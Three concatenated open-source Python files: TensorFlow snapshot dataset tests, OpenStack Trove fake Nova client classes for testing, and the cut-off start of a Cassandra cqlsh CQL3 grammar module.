snapshot.COMPRESSION_NONE, snapshot.COMPRESSION_GZIP,
snapshot.COMPRESSION_SNAPPY
])))
def testWriteSnapshotSimpleSuccessful(self, compression):
tmpdir = self.makeSnapshotDirectory()
dataset = dataset_ops.Dataset.range(1000)
dataset = dataset.apply(snapshot.snapshot(tmpdir, compression=compression))
self.assertDatasetProduces(dataset, list(range(1000)))
self.assertSnapshotDirectoryContains(tmpdir, 1, 1, 1)
@combinations.generate(test_base.default_test_combinations())
def testWriteSnapshotRepeatAfterwards(self):
tmpdir = self.makeSnapshotDirectory()
dataset = dataset_ops.Dataset.range(10)
dataset = dataset.apply(snapshot.snapshot(tmpdir))
dataset = dataset.repeat(10)
self.assertDatasetProduces(dataset, list(range(10)) * 10)
self.assertSnapshotDirectoryContains(tmpdir, 1, 1, 1)
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(compression=[
snapshot.COMPRESSION_NONE, snapshot.COMPRESSION_GZIP,
snapshot.COMPRESSION_SNAPPY
])))
def testReadSnapshotBackAfterWrite(self, compression):
self.setUpTFRecord()
filenames = self.test_filenames
expected = [
b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension
for f in range(0, 10)
for r in range(0, 10)
]
tmpdir = self.makeSnapshotDirectory()
dataset = core_readers._TFRecordDataset(filenames)
dataset = dataset.apply(snapshot.snapshot(tmpdir, compression=compression))
self.assertDatasetProduces(dataset, expected)
# remove the original files and try to read the data back only from snapshot
self.removeTFRecords()
dataset2 = core_readers._TFRecordDataset(filenames)
dataset2 = dataset2.apply(snapshot.snapshot(
tmpdir, compression=compression))
self.assertDatasetProduces(dataset2, expected)
@combinations.generate(test_base.default_test_combinations())
def testReadShuffledSnapshotAfterWrite(self):
self.setUpTFRecord(num_files=10, num_records=50)
filenames = self.test_filenames
expected = [
b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension
for f in range(0, 10)
for r in range(0, 50)
]
tmpdir = self.makeSnapshotDirectory()
dataset = core_readers._TFRecordDataset(filenames)
dataset = dataset.apply(snapshot.snapshot(tmpdir, shard_size_bytes=10))
self.assertDatasetProduces(dataset, expected)
# remove the original files and try to read the data back only from snapshot
self.removeTFRecords()
dataset2 = core_readers._TFRecordDataset(filenames)
dataset2 = dataset2.apply(snapshot.snapshot(tmpdir, shuffle_on_read=True))
next2 = self.getNext(dataset2)
res1 = self.evaluate(next2())
res2 = self.evaluate(next2())
res3 = self.evaluate(next2())
res4 = self.evaluate(next2())
res5 = self.evaluate(next2())
# make sure that we don't read the file back in the same order.
self.assertNotEqual([res1, res2, res3, res4, res5], expected[0:5])
# make sure all the elements are still there
dataset3 = core_readers._TFRecordDataset(filenames)
dataset3 = dataset3.apply(snapshot.snapshot(tmpdir, shuffle_on_read=True))
self.assertDatasetProduces(dataset3, expected, assert_items_equal=True)
@combinations.generate(test_base.default_test_combinations())
def testReadSnapshotParallelAfterWrite(self):
self.setUpTFRecord(10, 4000)
filenames = self.test_filenames
expected = [
b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension
for f in range(0, 10)
for r in range(0, 4000)
]
tmpdir = self.makeSnapshotDirectory()
dataset = core_readers._TFRecordDataset(filenames)
dataset = dataset.apply(
snapshot.snapshot(
tmpdir,
shard_size_bytes=1024 * 1024,
num_reader_threads=2,
reader_buffer_size=10))
self.assertDatasetProduces(dataset, expected, assert_items_equal=True)
# remove the original files and try to read the data back only from
# snapshot.
self.removeTFRecords()
dataset2 = core_readers._TFRecordDataset(filenames)
dataset2 = dataset2.apply(
snapshot.snapshot(
tmpdir,
shard_size_bytes=1024 * 1024,
num_reader_threads=2,
reader_buffer_size=10))
self.assertDatasetProduces(dataset2, expected, assert_items_equal=True)
# Not testing Snappy here because Snappy reads currently require a lot of
# memory.
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.times(
combinations.combine(compression=[
snapshot.COMPRESSION_NONE, snapshot.COMPRESSION_GZIP
]),
combinations.combine(threads=2, size=[1, 2]) +
combinations.combine(threads=8, size=[1, 4, 8]))))
def testReadSnapshotBackAfterMultiThreadedWrite(
self, compression, threads, size):
self.setUpTFRecord()
filenames = self.test_filenames
expected = [
b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension
for f in range(0, 10)
for r in range(0, 10)
]
tmpdir = self.makeSnapshotDirectory()
dataset = core_readers._TFRecordDataset(filenames)
dataset = dataset.apply(
snapshot.snapshot(
tmpdir,
compression=compression,
num_writer_threads=threads,
writer_buffer_size=size))
self.assertDatasetProduces(dataset, expected)
# remove the original files and try to read the data back only from
# snapshot
self.removeTFRecords()
dataset2 = core_readers._TFRecordDataset(filenames)
dataset2 = dataset2.apply(
snapshot.snapshot(tmpdir, compression=compression))
self.assertDatasetProduces(dataset2, expected, assert_items_equal=True)
@combinations.generate(test_base.default_test_combinations())
def testSameFingerprintWithDifferentInitializationOrder(self):
tmpdir = self.makeSnapshotDirectory()
dataset1 = dataset_ops.Dataset.range(0, 100)
dataset2 = dataset_ops.Dataset.range(100, 200)
dataset3 = dataset_ops.Dataset.range(200, 300)
dataset = dataset1.concatenate(dataset2).concatenate(dataset3)
dataset = dataset.apply(snapshot.snapshot(tmpdir))
self.assertDatasetProduces(dataset, list(range(300)))
dataset4 = dataset_ops.Dataset.range(200, 300)
dataset5 = dataset_ops.Dataset.range(100, 200)
dataset6 = dataset_ops.Dataset.range(0, 100)
dataset = dataset6.concatenate(dataset5).concatenate(dataset4)
dataset = dataset.apply(snapshot.snapshot(tmpdir))
self.assertDatasetProduces(dataset, list(range(300)))
self.assertSnapshotDirectoryContains(tmpdir, 1, 1, 1)
@combinations.generate(test_base.default_test_combinations())
def testExpiredSnapshotRewrite(self):
tmpdir = self.makeSnapshotDirectory()
dataset1 = dataset_ops.Dataset.range(1000)
dataset1 = dataset1.apply(
snapshot.snapshot(tmpdir, pending_snapshot_expiry_seconds=1))
next1 = self.getNext(dataset1)
# Don't finish reading dataset1, so it is never finalized
for _ in range(500):
self.evaluate(next1())
self.assertSnapshotDirectoryContains(tmpdir, 1, 1, 1)
time.sleep(2)
# Creating dataset2 after we run through dataset1 due to eager mode, where
# the snapshot state is determined immediately upon dataset creation. We
# only want to determine the snapshot state for dataset2 after the first
# snapshot has expired.
dataset2 = dataset_ops.Dataset.range(1000)
dataset2 = dataset2.apply(
snapshot.snapshot(tmpdir, pending_snapshot_expiry_seconds=1))
next2 = self.getNext(dataset2)
for _ in range(500):
self.evaluate(next2())
self.assertSnapshotDirectoryContains(tmpdir, 1, 2, 1)
@combinations.generate(test_base.default_test_combinations())
def testSpecifyShardSize(self):
tmpdir = self.makeSnapshotDirectory()
dataset = dataset_ops.Dataset.from_tensor_slices([1.0])
dataset = dataset.map(lambda x: gen_array_ops.broadcast_to(x, [1024, 1024]))
dataset = dataset.repeat(10)
dataset = dataset.apply(
snapshot.snapshot(tmpdir, shard_size_bytes=10 * 1024 * 1024))
next_fn = self.getNext(dataset)
for _ in range(10):
self.evaluate(next_fn())
self.assertSnapshotDirectoryContains(tmpdir, 1, 1, 4)
@combinations.generate(test_base.default_test_combinations())
def testAdditionalOperationsAfterReadBack(self):
self.setUpTFRecord()
filenames = self.test_filenames
expected = [
b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension
for f in range(0, 10)
for r in range(0, 10)
]
tmpdir = self.makeSnapshotDirectory()
dataset = core_readers._TFRecordDataset(filenames)
dataset = dataset.apply(snapshot.snapshot(tmpdir))
self.assertDatasetProduces(dataset, expected)
# remove the original files and try to read the data back only from snapshot
self.removeTFRecords()
dataset2 = core_readers._TFRecordDataset(filenames)
dataset2 = dataset2.apply(snapshot.snapshot(tmpdir))
self.assertDatasetProduces(dataset2, expected)
expected_after = [
b"cord %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension
for f in range(0, 10)
for r in range(0, 10)
]
dataset3 = core_readers._TFRecordDataset(filenames)
dataset3 = dataset3.apply(snapshot.snapshot(tmpdir))
dataset3 = dataset3.map(lambda x: string_ops.substr_v2(x, 2, 1000))
self.assertDatasetProduces(dataset3, expected_after)
if __name__ == "__main__":
test.main()
| |
# Copyright 2010-2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from novaclient import exceptions as nova_exceptions
from oslo_log import log as logging
from trove.common.exception import PollTimeOut
from trove.common import instance as rd_instance
from trove.tests.fakes.common import authorize
import collections
import eventlet
import uuid
LOG = logging.getLogger(__name__)
FAKE_HOSTS = ["fake_host_1", "fake_host_2"]
class FakeFlavor(object):
def __init__(self, id, disk, name, ram, ephemeral=0, vcpus=10):
self.id = id
self.disk = disk
self.name = name
self.ram = ram
self.vcpus = vcpus
self.ephemeral = ephemeral
@property
def links(self):
url = ("http://localhost:8774/v2/5064d71eb09c47e1956cf579822bae9a/"
"flavors/%s") % self.id
return [{"href": url, "rel": link_type}
for link_type in ['self', 'bookmark']]
@property
def href_suffix(self):
return "flavors/%s" % self.id
class FakeFlavors(object):
def __init__(self):
self.db = {}
self._add(1, 0, "m1.tiny", 512)
self._add(2, 20, "m1.small", 2048)
self._add(3, 40, "m1.medium", 4096)
self._add(4, 80, "m1.large", 8192)
self._add(5, 160, "m1.xlarge", 16384)
self._add(6, 0, "m1.nano", 64)
self._add(7, 0, "m1.micro", 128)
self._add(8, 2, "m1.rd-smaller", 768)
self._add(9, 10, "tinier", 506)
self._add(10, 2, "m1.rd-tiny", 512)
self._add(11, 0, "eph.rd-tiny", 512, 1)
self._add(12, 20, "eph.rd-smaller", 768, 2)
self._add("custom", 25, "custom.small", 512, 1)
# self._add(13, 20, "m1.heat", 512)
def _add(self, *args, **kwargs):
new_flavor = FakeFlavor(*args, **kwargs)
self.db[new_flavor.id] = new_flavor
def get(self, id):
try:
id = int(id)
except ValueError:
pass
if id not in self.db:
raise nova_exceptions.NotFound(404, "Flavor id not found %s" % id)
return self.db[id]
def get_by_href(self, href):
for id in self.db:
value = self.db[id]
# Use inexact match since faking the exact endpoints would be
# difficult.
if href.endswith(value.href_suffix):
return value
raise nova_exceptions.NotFound(404, "Flavor href not found %s" % href)
def list(self):
return [self.get(id) for id in self.db]
class FakeServer(object):
next_local_id = 0
def __init__(self, parent, owner, id, name, image_id, flavor_ref,
block_device_mapping, volumes):
self.owner = owner # This is a context.
self.id = id
self.parent = parent
self.name = name
self.image_id = image_id
self.flavor_ref = flavor_ref
self.old_flavor_ref = None
self._current_status = "BUILD"
self.volumes = volumes
# This is used by "RdServers". Its easier to compute the
# fake value in this class's initializer.
self._local_id = self.next_local_id
self.next_local_id += 1
info_vols = []
for volume in self.volumes:
info_vols.append({'id': volume.id})
volume.set_attachment(id)
volume.schedule_status("in-use", 1)
self.host = FAKE_HOSTS[0]
self.old_host = None
setattr(self, 'OS-EXT-AZ:availability_zone', 'nova')
self._info = {'os:volumes': info_vols}
@property
def addresses(self):
return {"private": [{"addr": "123.123.123.123"}]}
def confirm_resize(self):
if self.status != "VERIFY_RESIZE":
raise RuntimeError("Not in resize confirm mode.")
self._current_status = "ACTIVE"
def revert_resize(self):
if self.status != "VERIFY_RESIZE":
raise RuntimeError("Not in resize confirm mode.")
self.host = self.old_host
self.old_host = None
self.flavor_ref = self.old_flavor_ref
self.old_flavor_ref = None
self._current_status = "ACTIVE"
def reboot(self):
LOG.debug("Rebooting server %s" % (self.id))
def set_to_active():
self._current_status = "ACTIVE"
self.parent.schedule_simulate_running_server(self.id, 1.5)
self._current_status = "REBOOT"
eventlet.spawn_after(1, set_to_active)
def delete(self):
self.schedule_status = []
# TODO(pdmars): This is less than ideal, but a quick way to force it
# into the error state before scheduling the delete.
if (self.name.endswith("_ERROR_ON_DELETE") and
self._current_status != "SHUTDOWN"):
# Fail to delete properly the first time, just set the status
# to SHUTDOWN and break. It's important that we only fail to delete
# once in fake mode.
self._current_status = "SHUTDOWN"
return
self._current_status = "SHUTDOWN"
self.parent.schedule_delete(self.id, 1.5)
@property
def flavor(self):
return FLAVORS.get_by_href(self.flavor_ref).__dict__
@property
def links(self):
url = "https://localhost:9999/v1.0/1234/instances/%s" % self.id
return [{"href": url, "rel": link_type}
for link_type in ['self', 'bookmark']]
def migrate(self, force_host=None):
self.resize(None, force_host)
def resize(self, new_flavor_id=None, force_host=None):
self._current_status = "RESIZE"
if self.name.endswith("_RESIZE_TIMEOUT"):
raise PollTimeOut()
def set_to_confirm_mode():
self._current_status = "VERIFY_RESIZE"
def set_to_active():
self.parent.schedule_simulate_running_server(self.id, 1.5)
eventlet.spawn_after(1, set_to_active)
def change_host():
self.old_host = self.host
if not force_host:
self.host = [host for host in FAKE_HOSTS
if host != self.host][0]
else:
self.host = force_host
def set_flavor():
if self.name.endswith("_RESIZE_ERROR"):
self._current_status = "ACTIVE"
return
if new_flavor_id is None:
# Migrations are flavorless flavor resizes.
# A resize MIGHT change the host, but a migrate
# deliberately does.
LOG.debug("Migrating fake instance.")
eventlet.spawn_after(0.75, change_host)
else:
LOG.debug("Resizing fake instance.")
self.old_flavor_ref = self.flavor_ref
flavor = self.parent.flavors.get(new_flavor_id)
self.flavor_ref = flavor.links[0]['href']
eventlet.spawn_after(1, set_to_confirm_mode)
eventlet.spawn_after(0.8, set_flavor)
def schedule_status(self, new_status, time_from_now):
"""Makes a new status take effect at the given time."""
def set_status():
self._current_status = new_status
eventlet.spawn_after(time_from_now, set_status)
@property
def status(self):
return self._current_status
@property
def created(self):
return "2012-01-25T21:55:51Z"
@property
def updated(self):
return "2012-01-25T21:55:51Z"
@property
def tenant(self): # This is on the RdServer extension type.
return self.owner.tenant
@property
def tenant_id(self):
return self.owner.tenant
# The global var contains the servers dictionary in use for the life of these
# tests.
FAKE_SERVERS_DB = {}
class FakeServers(object):
def __init__(self, context, flavors):
self.context = context
self.db = FAKE_SERVERS_DB
self.flavors = flavors
def can_see(self, id):
"""Can this FakeServers, with its context, see some resource?"""
server = self.db[id]
return (self.context.is_admin or
server.owner.tenant == self.context.tenant)
def create(self, name, image_id, flavor_ref, files=None, userdata=None,
block_device_mapping=None, volume=None, security_groups=None,
availability_zone=None, nics=None, config_drive=False,
scheduler_hints=None):
id = "FAKE_%s" % uuid.uuid4()
if volume:
volume = self.volumes.create(volume['size'], volume['name'],
volume['description'])
while volume.status == "BUILD":
eventlet.sleep(0.1)
if volume.status != "available":
LOG.info(_("volume status = %s") % volume.status)
raise nova_exceptions.ClientException("Volume was bad!")
mapping = "%s::%s:%s" % (volume.id, volume.size, 1)
block_device_mapping = {'vdb': mapping}
volumes = [volume]
LOG.debug("Fake Volume Create %(volumeid)s with "
"status %(volumestatus)s" %
{'volumeid': volume.id, 'volumestatus': volume.status})
else:
volumes = self._get_volumes_from_bdm(block_device_mapping)
for volume in volumes:
volume.schedule_status('in-use', 1)
server = FakeServer(self, self.context, id, name, image_id, flavor_ref,
block_device_mapping, volumes)
self.db[id] = server
if name.endswith('SERVER_ERROR'):
raise nova_exceptions.ClientException("Fake server create error.")
if availability_zone == 'BAD_ZONE':
raise nova_exceptions.ClientException("The requested availability "
"zone is not available.")
if nics:
if 'port-id' in nics[0] and nics[0]['port-id'] == "UNKNOWN":
raise nova_exceptions.ClientException("The requested "
"port-id is not "
"available.")
server.schedule_status("ACTIVE", 1)
LOG.info("FAKE_SERVERS_DB : %s" % str(FAKE_SERVERS_DB))
return server
def _get_volumes_from_bdm(self, block_device_mapping):
volumes = []
if block_device_mapping is not None:
# block_device_mapping is a dictionary, where the key is the
# device name on the compute instance and the mapping info is a
# set of fields in a string, separated by colons.
# For each device, find the volume, and record the mapping info
# to another fake object and attach it to the volume
# so that the fake API can later retrieve this.
for device in block_device_mapping:
mapping = block_device_mapping[device]
(id, _type, size, delete_on_terminate) = mapping.split(":")
volume = self.volumes.get(id)
volume.mapping = FakeBlockDeviceMappingInfo(
id, device, _type, size, delete_on_terminate)
volumes.append(volume)
return volumes
def get(self, id):
if id not in self.db:
LOG.error(_("Couldn't find server id %(id)s, collection=%(db)s") %
{'id': id, 'db': self.db})
raise nova_exceptions.NotFound(404, "Not found")
else:
if self.can_see(id):
return self.db[id]
else:
raise nova_exceptions.NotFound(404, "Bad permissions")
def get_server_volumes(self, server_id):
"""Fake method we've added to grab servers from the volume."""
return [volume.mapping
for volume in self.get(server_id).volumes
if volume.mapping is not None]
def list(self):
return [v for (k, v) in self.db.items() if self.can_see(v.id)]
def schedule_delete(self, id, time_from_now):
def delete_server():
LOG.info(_("Simulated event ended, deleting server %s.") % id)
del self.db[id]
eventlet.spawn_after(time_from_now, delete_server)
def schedule_simulate_running_server(self, id, time_from_now):
from trove.instance.models import DBInstance
from trove.instance.models import InstanceServiceStatus
def set_server_running():
instance = DBInstance.find_by(compute_instance_id=id)
LOG.debug("Setting server %s to running" % instance.id)
status = InstanceServiceStatus.find_by(instance_id=instance.id)
status.status = rd_instance.ServiceStatuses.RUNNING
status.save()
eventlet.spawn_after(time_from_now, set_server_running)
class FakeRdServer(object):
def __init__(self, server):
self.server = server
self.deleted = False
self.deleted_at = None # Not sure how to simulate "True" for this.
self.local_id = server._local_id
def __getattr__(self, name):
return getattr(self.server, name)
class FakeRdServers(object):
def __init__(self, servers):
self.servers = servers
def get(self, id):
return FakeRdServer(self.servers.get(id))
def list(self):
# Attach the extra Rd Server stuff to the normal server.
return [FakeRdServer(server) for server in self.servers.list()]
class FakeServerVolumes(object):
def __init__(self, context):
self.context = context
def get_server_volumes(self, server_id):
class ServerVolumes(object):
def __init__(self, block_device_mapping):
LOG.debug("block_device_mapping = %s" %
block_device_mapping)
device = block_device_mapping['vdb']
(self.volumeId,
self.type,
self.size,
self.delete_on_terminate) = device.split(":")
fake_servers = FakeServers(self.context, FLAVORS)
server = fake_servers.get(server_id)
return [ServerVolumes(server.block_device_mapping)]
class FakeVolume(object):
def __init__(self, parent, owner, id, size, name,
description, volume_type):
self.attachments = []
self.parent = parent
self.owner = owner # This is a context.
self.id = id
self.size = size
self.name = name
self.description = description
self._current_status = "BUILD"
# For some reason we grab this thing from device then call it mount
# point.
self.device = "vdb"
self.volume_type = volume_type
def __repr__(self):
msg = ("FakeVolume(id=%s, size=%s, name=%s, "
"description=%s, _current_status=%s)")
params = (self.id, self.size, self.name,
self.description, self._current_status)
return (msg % params)
@property
def availability_zone(self):
return "fake-availability-zone"
@property
def created_at(self):
return "2001-01-01-12:30:30"
def get(self, key):
return getattr(self, key)
def schedule_status(self, new_status, time_from_now):
"""Makes a new status take effect at the given time."""
def set_status():
self._current_status = new_status
eventlet.spawn_after(time_from_now, set_status)
def set_attachment(self, server_id):
"""Fake method we've added to set attachments. Idempotent."""
for attachment in self.attachments:
if attachment['server_id'] == server_id:
return # Do nothing
self.attachments.append({'server_id': server_id,
'device': self.device})
@property
def status(self):
return self._current_status
class FakeBlockDeviceMappingInfo(object):
def __init__(self, id, device, _type, size, delete_on_terminate):
self.volumeId = id
self.device = device
self.type = _type
self.size = size
self.delete_on_terminate = delete_on_terminate
FAKE_VOLUMES_DB = {}
class FakeVolumes(object):
def __init__(self, context):
self.context = context
self.db = FAKE_VOLUMES_DB
def can_see(self, id):
"""Can this FakeVolumes, with its context, see some resource?"""
server = self.db[id]
return (self.context.is_admin or
server.owner.tenant == self.context.tenant)
def get(self, id):
if id not in self.db:
LOG.error(_("Couldn't find volume id %(id)s, collection=%(db)s") %
{'id': id, 'db': self.db})
raise nova_exceptions.NotFound(404, "Not found")
else:
if self.can_see(id):
return self.db[id]
else:
raise nova_exceptions.NotFound(404, "Bad permissions")
def create(self, size, name=None, description=None, volume_type=None):
id = "FAKE_VOL_%s" % uuid.uuid4()
volume = FakeVolume(self, self.context, id, size, name,
description, volume_type)
self.db[id] = volume
if size == 9:
volume.schedule_status("error", 2)
elif size == 13:
raise Exception("No volume for you!")
else:
volume.schedule_status("available", 2)
LOG.debug("Fake volume created %(volumeid)s with "
"status %(volumestatus)s" %
{'volumeid': volume.id, 'volumestatus': volume.status})
LOG.info("FAKE_VOLUMES_DB : %s" % FAKE_VOLUMES_DB)
return volume
def list(self, detailed=True):
return [self.db[key] for key in self.db]
def extend(self, volume_id, new_size):
LOG.debug("Resize volume id (%(volumeid)s) to size (%(size)s)" %
{'volumeid': volume_id, 'size': new_size})
volume = self.get(volume_id)
if volume._current_status != 'available':
raise Exception("Invalid volume status: "
"expected 'in-use' but was '%s'" %
volume._current_status)
def finish_resize():
volume.size = new_size
eventlet.spawn_after(1.0, finish_resize)
def delete_server_volume(self, server_id, volume_id):
volume = self.get(volume_id)
if volume._current_status != 'in-use':
raise Exception("Invalid volume status: "
"expected 'in-use' but was '%s'" %
volume._current_status)
def finish_detach():
volume._current_status = "available"
eventlet.spawn_after(1.0, finish_detach)
def create_server_volume(self, server_id, volume_id, device_path):
volume = self.get(volume_id)
if volume._current_status != "available":
raise Exception("Invalid volume status: "
"expected 'available' but was '%s'" %
volume._current_status)
def finish_attach():
volume._current_status = "in-use"
eventlet.spawn_after(1.0, finish_attach)
class FakeAccount(object):
def __init__(self, id, servers):
self.id = id
self.servers = self._servers_to_dict(servers)
def _servers_to_dict(self, servers):
ret = []
for server in servers:
server_dict = {}
server_dict['id'] = server.id
server_dict['name'] = server.name
server_dict['status'] = server.status
server_dict['host'] = server.host
ret.append(server_dict)
return ret
class FakeAccounts(object):
def __init__(self, context, servers):
self.context = context
self.db = FAKE_SERVERS_DB
self.servers = servers
def _belongs_to_tenant(self, tenant, id):
server = self.db[id]
return server.tenant == tenant
def get_instances(self, id):
authorize(self.context)
servers = [v for (k, v) in self.db.items()
if self._belongs_to_tenant(id, v.id)]
return FakeAccount(id, servers)
FLAVORS = FakeFlavors()
class FakeHost(object):
def __init__(self, name, servers):
self.name = name
self.servers = servers
self.instances = []
self.percentUsed = 0
self.totalRAM = 0
self.usedRAM = 0
@property
def instanceCount(self):
return len(self.instances)
def recalc(self):
"""
This fake-mode exclusive method recalculates the fake data this
object passes back.
"""
self.instances = []
self.percentUsed = 0
self.totalRAM = 32000 # 16384
self.usedRAM = 0
for server in self.servers.list():
print(server)
if server.host != self.name:
print("\t...not on this host.")
continue
self.instances.append({
'uuid': server.id,
'name': server.name,
'status': server.status
})
if (str(server.flavor_ref).startswith('http:') or
str(server.flavor_ref).startswith('https:')):
flavor = FLAVORS.get_by_href(server.flavor_ref)
else:
flavor = FLAVORS.get(server.flavor_ref)
ram = flavor.ram
self.usedRAM += ram
decimal = float(self.usedRAM) / float(self.totalRAM)
self.percentUsed = int(decimal * 100)
class FakeHosts(object):
def __init__(self, servers):
# Use an ordered dict to make the results of the fake api call
# return in the same order for the example generator.
self.hosts = collections.OrderedDict()
for host in FAKE_HOSTS:
self.add_host(FakeHost(host, servers))
def add_host(self, host):
self.hosts[host.name] = host
return host
def get(self, name):
try:
self.hosts[name].recalc()
return self.hosts[name]
except KeyError:
raise nova_exceptions.NotFound(404, "Host not found %s" % name)
def list(self):
for name in self.hosts:
self.hosts[name].recalc()
return [self.hosts[name] for name in self.hosts]
class FakeRdStorage(object):
def __init__(self, name):
self.name = name
self.type = ""
self.used = 0
self.capacity = {}
self.provision = {}
def recalc(self):
self.type = "test_type"
self.used = 10
self.capacity['total'] = 100
self.capacity['available'] = 90
self.provision['total'] = 50
self.provision['available'] = 40
self.provision['percent'] = 10
class FakeRdStorages(object):
def __init__(self):
self.storages = {}
self.add_storage(FakeRdStorage("fake_storage"))
def add_storage(self, storage):
self.storages[storage.name] = storage
return storage
def list(self):
for name in self.storages:
self.storages[name].recalc()
return [self.storages[name] for name in self.storages]
class FakeSecurityGroup(object):
def __init__(self, name=None, description=None, context=None):
self.name = name
self.description = description
self.id = "FAKE_SECGRP_%s" % uuid.uuid4()
self.rules = {}
def get_id(self):
return self.id
def add_rule(self, fakeSecGroupRule):
self.rules.append(fakeSecGroupRule)
return self.rules
def get_rules(self):
result = ""
for rule in self.rules:
result = result + rule.data()
return result
def data(self):
return {
'id': self.id,
'name': self.name,
'description': self.description
}
class FakeSecurityGroups(object):
def __init__(self, context=None):
self.context = context
self.securityGroups = {}
def create(self, name=None, description=None):
secGrp = FakeSecurityGroup(name, description)
self.securityGroups[secGrp.get_id()] = secGrp
return secGrp
def delete(self, group_id):
pass
def list(self):
pass
class FakeSecurityGroupRule(object):
def __init__(self, ip_protocol=None, from_port=None, to_port=None,
cidr=None, parent_group_id=None, context=None):
self.group_id = parent_group_id
self.protocol = ip_protocol
self.from_port = from_port
self.to_port = to_port
self.cidr = cidr
self.context = context
self.id = "FAKE_SECGRP_RULE_%s" % uuid.uuid4()
def get_id(self):
return self.id
def data(self):
return {
'id': self.id,
'group_id': self.group_id,
'protocol': self.protocol,
'from_port': self.from_port,
'to_port': self.to_port,
'cidr': self.cidr
}
class FakeSecurityGroupRules(object):
def __init__(self, context=None):
self.context = context
self.securityGroupRules = {}
def create(self, parent_group_id, ip_protocol, from_port, to_port, cidr):
secGrpRule = FakeSecurityGroupRule(ip_protocol, from_port, to_port,
cidr, parent_group_id)
self.securityGroupRules[secGrpRule.get_id()] = secGrpRule
return secGrpRule
def delete(self, id):
if id in self.securityGroupRules:
del self.securityGroupRules[id]
class FakeServerGroup(object):
def __init__(self, name=None, policies=None, context=None):
self.name = name
self.description = description
self.id = "FAKE_SRVGRP_%s" % uuid.uuid4()
self.policies = policies or {}
def get_id(self):
return self.id
def data(self):
return {
'id': self.id,
'name': self.name,
'policies': self.policies
}
class FakeServerGroups(object):
def __init__(self, context=None):
self.context = context
self.server_groups = {}
def create(self, name=None, policies=None):
server_group = FakeServerGroup(name, policies, context=self.context)
self.server_groups[server_group.get_id()] = server_group
return server_group
def delete(self, group_id):
pass
def list(self):
return self.server_groups
class FakeClient(object):
def __init__(self, context):
self.context = context
self.flavors = FLAVORS
self.servers = FakeServers(context, self.flavors)
self.volumes = FakeVolumes(context)
self.servers.volumes = self.volumes
self.accounts = FakeAccounts(context, self.servers)
self.rdhosts = FakeHosts(self.servers)
self.rdstorage = FakeRdStorages()
self.rdservers = FakeRdServers(self.servers)
self.security_groups = FakeSecurityGroups(context)
self.security_group_rules = FakeSecurityGroupRules(context)
self.server_groups = FakeServerGroups(context)
def get_server_volumes(self, server_id):
return self.servers.get_server_volumes(server_id)
def rescan_server_volume(self, server, volume_id):
LOG.info("FAKE rescanning volume.")
CLIENT_DATA = {}
def get_client_data(context):
if context not in CLIENT_DATA:
nova_client = FakeClient(context)
volume_client = FakeClient(context)
volume_client.servers = nova_client
CLIENT_DATA[context] = {
'nova': nova_client,
'volume': volume_client
}
return CLIENT_DATA[context]
def fake_create_nova_client(context):
return get_client_data(context)['nova']
def fake_create_nova_volume_client(context):
return get_client_data(context)['volume']
def fake_create_cinder_client(context):
return get_client_data(context)['volume']
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from warnings import warn
from .cqlhandling import CqlParsingRuleSet, Hint
from cql.cqltypes import (cql_types, lookup_casstype, CompositeType, UTF8Type,
ColumnToCollectionType, CounterColumnType, DateType)
from . import helptopics
simple_cql_types = set(cql_types)
simple_cql_types.difference_update(('set', 'map', 'list'))
cqldocs = helptopics.CQL3HelpTopics()
try:
import json
except ImportError:
import simplejson as json
# temporarily have this here until a newer cassandra-dbapi2 is bundled with C*
class TimestampType(DateType):
pass
class UnexpectedTableStructure(UserWarning):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return 'Unexpected table structure; may not translate correctly to CQL. ' + self.msg
SYSTEM_KEYSPACES = ('system', 'system_traces', 'system_auth')
NONALTERBALE_KEYSPACES = ('system')
class Cql3ParsingRuleSet(CqlParsingRuleSet):
keywords = set((
'select', 'from', 'where', 'and', 'key', 'insert', 'update', 'with',
'limit', 'using', 'use', 'count', 'set',
'begin', 'apply', 'batch', 'truncate', 'delete', 'in', 'create',
'keyspace', 'schema', 'columnfamily', 'table', 'index', 'on', 'drop',
'primary', 'into', 'values', 'timestamp', 'ttl', 'alter', 'add', 'type',
'compact', 'storage', 'order', 'by', 'asc', 'desc', 'clustering',
'token', 'writetime', 'map', 'list', 'to', 'custom', 'if', 'not'
))
unreserved_keywords = set((
'key', 'clustering', 'ttl', 'compact', 'storage', 'type', 'values', 'custom', 'exists'
))
columnfamily_layout_options = (
('bloom_filter_fp_chance', None),
('caching', None),
('comment', None),
('dclocal_read_repair_chance', 'local_read_repair_chance'),
('gc_grace_seconds', None),
('index_interval', None),
('read_repair_chance', None),
('replicate_on_write', None),
('populate_io_cache_on_flush', None),
('default_time_to_live', None),
('speculative_retry', None),
('memtable_flush_period_in_ms', None),
)
columnfamily_layout_map_options = (
# (CQL3 option name, schema_columnfamilies column name (or None if same),
# list of known map keys)
('compaction', 'compaction_strategy_options',
('class', 'max_threshold', 'tombstone_compaction_interval', 'tombstone_threshold', 'enabled', 'unchecked_tombstone_compaction')),
('compression', 'compression_parameters',
('sstable_compression', 'chunk_length_kb', 'crc_check_chance')),
)
obsolete_cf_options = ()
consistency_levels = (
'ANY',
'ONE',
'TWO',
